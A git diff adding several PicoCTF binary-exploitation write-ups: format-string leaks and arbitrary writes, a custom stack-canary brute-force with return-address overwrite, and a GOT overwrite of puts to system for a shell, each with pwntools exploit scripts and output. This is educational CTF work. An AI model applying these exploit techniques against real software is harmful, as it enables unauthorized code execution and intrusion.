+Here's your order: 0x402118.(nil).(nil).0x402116.0x7f54acd3ca80.0x4343434343434343.0x677f000a.0x7ffcb4297808.0x7f54acd71a48.0x1.0x7f54acd66f08.0x9.(nil).0x4242424242424242.0x7f54acd9000a.0x7ffcb42976f8.0x7ffcb4297700.0x7f54acd9c668.(nil).(nil).0x7f54acd91740.0x4141414141414141.0x7ffc0000000a.0x7f54acd9c2e0.0xffffffff.0x7f54acb7b678.0x7f54acd66400.0x1.0x7ffcb4297840.0x70252e70252e7025.0x252e70252e70252e.0x2e70252e70252e70.0x70252e70252e7025.0x252e70252e70252e.0x2e70252e70252e70.0x70252e70252e7025.0x252e70252e70252e.0x2e70252e70252e70.0x70252e70252e7025.0x252e70252e70252e.
+Bye!
+```
+
+We notice the hex patterns we were looking for (A, B, C) and see that the flag buffer (full of 0x42 "B" bytes) is at offset 14.
+
+## Remote exploit
+
+Now we can try this on the remote server, get the 14th pointer and the ones after:
+
+```
+$ nc mimas.picoctf.net 64683
+Give me your order and I'll read it back to you:
+%14$p.%15$p.%16$p.%17$p.%18$p.%19$p.%20$p
+Here's your order: 0x7b4654436f636970.0x355f31346d316e34.0x3478345f33317937.0x31395f673431665f.[REDACTED]
+Bye!
+```
+
+By swapping endianness (on 8-byte sequences) and removing the `0x` prefix and the `.` suffix, we get this raw byte sequence:
+
+```
+7069636f4354467b346e316d34315f35377931335f3478345f663134675f3931[REDACTED]
+```
+
+This, when encoded back to ASCII, gives us the flag:
+
+```
+picoCTF{4n1m41_57y13_4x4_f14g_[REDACTED]
+```
diff --git a/writeups/2025-08-24-fmt2.md b/writeups/2025-08-24-fmt2.md
new file mode 100644
index 0000000..4e4464c
--- /dev/null
+++ b/writeups/2025-08-24-fmt2.md
@@ -0,0 +1,125 @@
+---
+title: "PicoCTF 2024: format-string-2"
+excerpt: "Using format string bug to get an arbitrary write primitive"
+tags: [ctf, pwn] 
+---
+
+## Recon
+
+Following the format-string-1 challenge, we get an executable that we can analyze as always:
+
+```
+$ file vuln
+vuln: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=dfe923d97df1df729249ff21202d10ad15d45f4c, for GNU/Linux 3.2.0, not stripped
+$ checksec --file=vuln
+[*] '/home/qelal/PicoCTF/fmt2/vuln'
+    Arch:       amd64-64-little
+    RELRO:      Partial RELRO
+    Stack:      No canary found
+    NX:         NX enabled
+    PIE:        No PIE (0x400000)
+    SHSTK:      Enabled
+    IBT:        Enabled
+    Stripped:   No
+```
+
+We can take a look at the source code:
+
+```c
+#include <stdio.h>
+
+int sus = 0x21737573;
+
+int main() {
+  char buf[1024];
+  char flag[64];
+
+  printf("You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?\n");
+  fflush(stdout);
+  scanf("%1024s", buf);
+  printf("Here's your input: ");
+  printf(buf);
+  printf("\n");
+  fflush(stdout);
+
+  if (sus == 0x67616c66) {
+    printf("I have NO clue how you did that, you must be a wizard. Here you go...\n");
+
+    // Read in the flag
+    FILE *fd = fopen("flag.txt", "r");
+    fgets(flag, 64, fd);
+
+    printf("%s", flag);
+    fflush(stdout);
+  }
+  else {
+    printf("sus = 0x%x\n", sus);
+    printf("You can do better!\n");
+    fflush(stdout);
+  }
+
+  return 0;
+}
+```
+
+There is a format string bug on `printf(buf)`. This time we won't only need to read leaked data off the stack, but instead we'll have to overwrite a global variable, named `sus`. As it is global, it won't be stored on the stack as other local variables.
+
+Fortunately, as the binary is not PIE, we know that the address for `sus` will always be the same. It can be found from static analysis:
+
+```
+$ objdump -t vuln | grep sus
+0000000000404060 g     O .data  0000000000000004              sus
+```
+
+So it is located at `0x404060`. The value we'll have to overwrite `sus` with is `0x67616c66`, as we know from the source code.
+
+## Exploit
+
+To be able to inject the address of `sus` and write to it, we will first get the offset of where our input data is on the stack. To make it easy, we will inject an unique "AAAAAAAA" payload (which in ASCII is eight times 0x41) and see where it ends up:
+
+```
+$ ./vuln
+You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
+AAAAAAAA%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.
+Here's your input: AAAAAAAA0x402075.(nil).(nil).0x402073.0x7efcbbadaa80.0x7efcbbb3a668.0x7ffc00000001.0x7efcbbb3a2e0.0xffffffff.0x7efcbb919678.0x7efcbbb04400.0x1.0x7ffc68e8fea0.0x4141414141414141.0x70252e70252e7025.0x252e70252e70252e.
+sus = 0x21737573
+You can do better!
+```
+
+Our input is at the 14th position on the stack. To be sure we can confirm this offset by using a more precise format specifier:
+
+```
+$ ./vuln 
+You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
+AAAAAAAA%14$p
+Here's your input: AAAAAAAA0x4141414141414141
+sus = 0x21737573
+You can do better!
+```
+
+By the way we could also use a bit of dynamic analysis on our local machine (with a dummy flag file) to see if our hypothesis is right (unnecessary but still nice to see):
+
+```
+pwndbg> set *0x404060 = 0x67616c66
+pwndbg> c
+Continuing.
+ff
+Here's your input: ff
+I have NO clue how you did that, you must be a wizard. Here you go...
+CTF{dummy}
+[Inferior 1 (process 12774) exited normally]
+```
+
+Now that we know this, we can automate the exploit craft for this using the `fmtstr_payload` helper from pwntools:
+
+```python
+io = start()
+
+sus_addr = 0x404060
+payload = fmtstr_payload(14, {sus_addr: 0x67616c66})
+
+io.sendlineafter(b'say?', payload)
+print(io.recvall())
+```
+
+This writes the desired value to the address of `sus`, and the payload will be injected on 14th position of the stack, as we know this is where our input ends up being. We bypass the check, and get the flag.
diff --git a/writeups/2025-08-26-bo3.md b/writeups/2025-08-26-bo3.md
new file mode 100644
index 0000000..6f51ee0
--- /dev/null
+++ b/writeups/2025-08-26-bo3.md
@@ -0,0 +1,187 @@
+---
+title: "PicoCTF 2022: buffer-overflow-3"
+excerpt: "Bruteforcing a fake stack canary to exploit a buffer overflow in 32-bit x86"
+tags: [ctf, pwn] 
+---
+
+## Recon
+
+Today's executable is a 32-bit binary:
+
+```
+$ file vuln
+vuln: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=880ddfdc7ef13c4139ab8a80cc3d8225251a331f, for GNU/Linux 3.2.0, not stripped
+```
+
+Checking the enabled protections:
+
+```
+pwndbg> checksec
+File:     /home/qelal/PicoCTF/bo3/vuln
+Arch:     i386
+RELRO:      Partial RELRO
+Stack:      No canary found
+NX:         NX enabled
+PIE:        No PIE (0x8048000)
+SHSTK:      Enabled
+IBT:        Enabled
+Stripped:   No
+```
+
+Taking a look at the source code (some non-needed parts redacted):
+
+```c
+void win() { // reads the flag... }
+
+char global_canary[CANARY_SIZE];
+void read_canary() {
+  FILE *f = fopen("canary.txt","r");
+  if (f == NULL) {
+    printf("%s %s", "Please create 'canary.txt' in this directory with your",
+                    "own debugging canary.\n");
+    fflush(stdout);
+    exit(0);
+  }
+
+  fread(global_canary,sizeof(char),CANARY_SIZE,f);
+  fclose(f);
+}
+
+void vuln(){
+   char canary[CANARY_SIZE];
+   char buf[BUFSIZE];
+   char length[BUFSIZE];
+   int count;
+   int x = 0;
+   memcpy(canary,global_canary,CANARY_SIZE);
+   printf("How Many Bytes will You Write Into the Buffer?\n> ");
+   while (x<BUFSIZE) {
+      read(0,length+x,1);
+      if (length[x]=='\n') break;
+      x++;
+   }
+   sscanf(length,"%d",&count);
+
+   printf("Input> ");
+   read(0,buf,count);
+
+   if (memcmp(canary,global_canary,CANARY_SIZE)) {
+      printf("***** Stack Smashing Detected ***** : Canary Value Corrupt!\n"); // crash immediately
+      fflush(stdout);
+      exit(0);
+   }
+   printf("Ok... Now Where's the Flag?\n");
+   fflush(stdout);
+}
+
+int main(int argc, char **argv){
+  read_canary();
+  vuln();
+  return 0;
+}
+```
+
+As we can see, at some point the program reads for user input and asks how many bytes we want to write into the buffer. As the buffer is `BUFSIZE` or 64 bytes long, and as the `read` call follows our byte-count, this leads to an obvious buffer overflow.
+
+The problem is that, this time, it won't be as easy to exploit, as the developer rolled his own stack canary system which we will have to bypass...
+
+(Of course a better protection would simply be to enable regular canaries, but it was written like so for the purposes of the challenge.)
+
+## Getting around the canary
+
+Reading the source, we find that the canary is supplied in a `canary.txt` file and it is `CANARY_SIZE` or 4 bytes long. This is pretty short...
+
+As it is supplied from a file, we can assume it does not change between executions. Terrible mistake because this opens a bruteforcing attack vector for us.
+
+The bruteforcing attack will work as follows: first, we will inject padding corresponding to the offset to the canary (probably 64 bytes as the buffer is declared right next to our user input buffer in the source code, and it is a round number from a binary standpoint).
+
+Then, we will inject a guess letter, thus overwriting the 1st byte of the canary with our guess. If it is right, then the program will continue normal execution. But if it is wrong, it will throw us a stack smashing error, like so:
+
+```
+$ ./vuln 
+How Many Bytes will You Write Into the Buffer?
+> 100
+Input> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+***** Stack Smashing Detected ***** : Canary Value Corrupt!
+```
+
+From this change of behavior we can infer that the value we injected is correct, and we can move on to the 2nd position, repeating the same strategy, until we get all 4 bytes of the canary.
+
+When we get the full canary, as it never changes, we can use it however we want, and trigger the `win()` function by overwriting the return address in EIP.
+
+## Finding the EIP offset
+
+However this time we cannot simply inject a cyclic pattern and watch the EIP position. We will have to inject some padding, then our canary, and only then the cyclic pattern. We'll add these lengths to what the cyclic tool finds as an offset.
+
+```
+pwndbg> cyclic -l eaaa
+Finding cyclic pattern of 4 bytes: b'eaaa' (hex: 0x65616161)
+Found at offset 16
+```
+
+We have 16 bytes from the end of our guessed canary, so `64 (padding) + 4 (canary) + 16 (cyclic)` gives us 84 bytes to EIP. (In fact we don't really need the total offset, knowing 16 was sufficient.)
+
+## Finding win
+
+This is not complicated at all, because the binary is not PIE, so a simple static analysis can be used to find the address we'll overwrite with:
+
+```
+$ objdump -t vuln | grep win
+08049336 g     F .text  000000b3              win
+```
+
+## Exploit
+
+Knowing all this, we can now automate our canary bruteforcing and buffer overflow control flow hijack with a Pwntools script:
+
+```python
+offset = 64
+charset="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
+known = ""
+
+# Step 1: bruteforce the canary
+
+print("[+] bruteforcing stack canary...")
+
+for index in range(1, 5):
+    for char in charset:
+        io = start()
+        curr_guess = known+char
+        io.sendlineafter(b'> ', str(offset+index).encode())
+        io.sendlineafter(b'Input>', offset*b'A' + curr_guess.encode())
+        if b'Stack' in io.recvall():
+            #print("Fuck, wrong one")
+            io.wait()
+        else:
+            print(f"[+] position {index} -> char '{char}'")
+            io.wait()
+            known += char
+            break
+
+print("[+] canary seems to be: " + known)
+
+# Step 2: find EIP offset (from canary)
+
+eip_offset = 16 
+win_addr = p32(0x08049336)
+
+# Step 3: use it in buffer overflow to trigger win()
+
+io = start()
+io.sendlineafter(b'> ', str(offset+4+eip_offset+4).encode())
+io.sendlineafter(b'Input>', offset*b'A' + known.encode() + eip_offset*b'B' + win_addr)
+
+io.recvall()
+```
+
+And as always, (after some time) we get the precious flag..
+
+```
+[+] Receiving all data: Done (71B)
+[DEBUG] Received 0x46 bytes:
+    b"Ok... Now Where's the Flag?\n"
+    b'picoCTF{Stat1C_c4n4r13s_4R3_b4D_[REDACTED]}\n'
+[*] Closed connection to saturn.picoctf.net port 50666
+```
+
+This one was pretty nice, however now I wonder what bypassing real stack canaries looks like...
diff --git a/writeups/2025-08-27-fmt3.md b/writeups/2025-08-27-fmt3.md
new file mode 100644
index 0000000..bd166bd
--- /dev/null
+++ b/writeups/2025-08-27-fmt3.md
@@ -0,0 +1,183 @@
+---
+title: "PicoCTF 2024: format-string-3"
+excerpt: "Overwriting a GOT (Global Offset Table) entry using a format string vulnerability to get a shell on a 64-bit x86 target"
+tags: [ctf, pwn]
+---
+
+## Recon
+
+This challenge was given along with a libc and and interpreter file:
+
+```
+$ file format-string-3
+format-string-3: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter ./ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=54e1c4048a725df868e9a10dc975a46e8d8e5e92, not stripped
+$ file libc.so.6
+libc.so.6: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /usr/lib/ld-linux-x86-64.so.2, BuildID[sha1]=8bfe03f6bf9b6a6e2591babd0bbc266837d8f658, for GNU/Linux 4.4.0, stripped
+$ file ld-linux-x86-64.so.2 
+ld-linux-x86-64.so.2: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), static-pie linked, BuildID[sha1]=6ebd6e95dffa2afcbdaf7b7c91103b23ecf2b012, stripped
+```
+
+We can see that the main binary uses the interpreter given in the current folder. Taking a quick look at the protections, we see that PIE is enabled on the libc, but not on the main binary. Also, the challenge does not have Full RELRO on the main file:
+
+```
+➜  fmt3 venv
+$ checksec format-string-3
+[*] '/home/qelal/PicoCTF/fmt3/format-string-3'
+    Arch:       amd64-64-little
+    RELRO:      Partial RELRO
+    Stack:      Canary found
+    NX:         NX enabled
+    PIE:        No PIE (0x3ff000)
+    RUNPATH:    b'.'
+    SHSTK:      Enabled
+    IBT:        Enabled
+    Stripped:   No
+$ checksec libc.so.6
+[*] '/home/qelal/PicoCTF/fmt3/libc.so.6'
+    Arch:       amd64-64-little
+    RELRO:      Full RELRO
+    Stack:      Canary found
+    NX:         NX enabled
+    PIE:        PIE enabled
+    SHSTK:      Enabled
+    IBT:        Enabled
+```
+
+That is quite interesting. We can now take a look at the source code:
+
+```c
+#include <stdio.h>
+
+#define MAX_STRINGS 32
+
+char *normal_string = "/bin/sh";
+
+void setup() { // setting up the chall }
+
+void hello() {
+	puts("Howdy gamers!");
+	printf("Okay I'll be nice. Here's the address of setvbuf in libc: %p\n", &setvbuf);
+}
+
+int main() {
+	char *all_strings[MAX_STRINGS] = {NULL};
+	char buf[1024] = {'\0'};
+
+	setup();
+	hello();	
+
+	fgets(buf, 1024, stdin);	
+	printf(buf);
+
+	puts(normal_string);
+
+	return 0;
+}
+```
+
+Two interesting things here:
+- the first is that there is an obvious format string vulnerability on the `printf(buf)` call, which allows for arbitrary read/write as we know;
+- the second is that we call `puts()` on `/bin/sh`.
+
+Of course showing `/bin/sh` to the screen isn't nefarious, but we can take advantage of this argument placement and change `puts()` to something else..
+
+The idea here is that we will have to overwrite an entry in the GOT, to change the `puts("/bin/sh")` call to `system("/bin/sh")` and get a shell.
+
+## Finding the stack user input offset
+
+First we'll see where our user input ends up on the stack, by writing a noticeable "A" chain and then spamming `%p` format specifiers until we get there:
+
+```
+$ ./format-string-3 
+Howdy gamers!
+Okay I'll be nice. Here's the address of setvbuf in libc: 0x7f833ed353f0
+AAAAAAAA%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.
+AAAAAAAA0x7f833ee93963.0xfbad208b.0x7fff4c619340.0x1.(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).0x4141414141414141.0x70252e70252e7025.0x252e70252e70252e.0x2e70252e70252e70.0x70252e70252e7025.0x252e70252e70252e.0x2e70252e70252e70.
+/bin/sh
+```
+
+It seems to be at position 38. Just to be sure:
+
+```
+$ ./format-string-3 
+Howdy gamers!
+Okay I'll be nice. Here's the address of setvbuf in libc: 0x7f48bdb1b3f0
+AAAAAAAA%38$p
+AAAAAAAA0x4141414141414141
+/bin/sh
+```
+
+Yep, that is our offset.
+
+## Leaking libc addresses
+
+One thing we notice from the program's behavior is that it gives us the address for a random C function, `setvbuf`. It is not really useful for us in itself, but we can use this knowledge to leak the libc base address, or directly another function's address.
+
+I chose not to bother with the libc base here, and go straight for `system()`.
+
+So, from static analysis on the `libc.so.6` file, we can find the offsets for `setvbuf` and also for `system`:
+
+```
+.text:000000000004F760 system          proc near               ; DATA XREF: LOAD:000000000000B160↑o
+[...]
+.text:000000000007A3F0 setvbuf         proc near               ; CODE XREF: setlinebuf+D↓j
+```
+
+We have both offsets. Knowing this, we can establish the difference between those two symbols, and get the address we want from `setvbuf`'s leak:
+
+```
+difference = 0x7A3F0 - 0x4F760 = 0x2AC90
+system() = setvbuf() - 0x2AC90
+```
+
+Perfect! Now when the program will leak `setvbuf`, we will simply catch the address, and derive `system` from it.
+
+## Finding puts in the GOT
+
+The last information we need for the exploit to succeed is the address of `puts`. We can find it using dynamic analysis with Pwndbg: breaking when we're in the program and noting the address from here:
+
+```
+pwndbg> got
+Filtering out read-only entries (display them with -r or --show-readonly)
+
+State of the GOT of /home/qelal/PicoCTF/fmt3/format-string-3:
+GOT protection: Partial RELRO | Found 4 GOT entries passing the filter
+[0x404018] puts@GLIBC_2.2.5 -> 0x7ffff7e59bf0 (puts) ◂— endbr64 
+[0x404020] __stack_chk_fail@GLIBC_2.4 -> 0x401040 ◂— endbr64 
+[0x404028] printf@GLIBC_2.2.5 -> 0x7ffff7e36250 (printf) ◂— endbr64 
+[0x404030] fgets@GLIBC_2.2.5 -> 0x7ffff7e57d40 (fgets) ◂— endbr64 
+```
+
+So, in the GOT, `puts` is at `0x404018`. No PIE so it stays the same everytime.
+
+## Automating the format string exploitation
+
+Now we know that we have to write the address for `system` (that we leaked), instead of `puts`, at offset 38 on the stack. Writing a manual exploit is long and boring (although it's important to grasp the knowledge of how the format string arbitrary write works, but once you've done it, I'd consider using the automated helper from Pwntools to save some time) so we'll go with `fmtstr_payload`:
+
+```python
+io = start()
+io.recvline()
+
+setvbuf_addr = int(io.recvline().split(b"libc: ")[1].strip(b'\n'), 0)
+system_addr = setvbuf_addr - 0x2AC90
+
+puts_plt_addr = 0x404018
+
+payload = fmtstr_payload(38, {puts_plt_addr: system_addr})
+
+with open("payload", "wb") as file:
+    file.write(payload)
+
+io.sendline(payload)
+io.interactive()
+```
+
+And finally we get our shell:
+
+```
+$ cat flag.txt
+[DEBUG] Sent 0xd bytes:
+    b'cat flag.txt\n'
+[DEBUG] Received 0x1a bytes:
+    b'picoCTF{G07_G07?_[REDACTED]}'
+```